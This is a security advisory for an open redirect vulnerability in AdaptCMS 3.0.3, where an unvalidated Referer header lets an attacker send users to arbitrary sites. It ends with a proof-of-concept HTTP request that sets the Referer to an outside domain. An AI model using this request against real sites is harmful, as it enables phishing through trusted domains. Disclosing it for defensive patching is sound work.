AdaptCMS 3.0.3 HTTP Referer Header Open Redirect

`  
AdaptCMS 3.0.3 HTTP Referer Header Field Open Redirect Vulnerability  
  
  
Vendor: Insane Visions  
Product web page: http://www.adaptcms.com  
Affected version: 3.0.3  
  
Summary: AdaptCMS is a Content Management System trying  
to be both simple and easy to use, as well as very agile  
and extendable. Not only so we can easily create Plugins   
or additions, but so other developers can get involved.  
Using CakePHP we are able to achieve this with a built-in  
plugin system and MVC setup, allowing us to focus on the  
details and end-users to focus on building their website  
to look and feel great.  
  
Desc: Input passed via the 'Referer' header field is not  
properly verified before being used to redirect users.  
This can be exploited to redirect a user to an arbitrary  
website e.g. when a user clicks a specially crafted link  
to the affected script hosted on a trusted domain.  
  
====================================  
\lib\Cake\Controller\Controller.php:  
------------------------------------  
Line: 956  
..  
..  
Line: 974  
------------------------------------  
  
Tested on: Apache 2.4.10 (Win32)  
PHP 5.6.3  
MySQL 5.6.21  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5219  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5219.php  
  
  
29.12.2014  
  
--  
  
  
GET /adaptcms/admin/adaptbb/webroot/foo HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0  
Connection: keep-alive  
Referer: http://zeroscience.mk  
`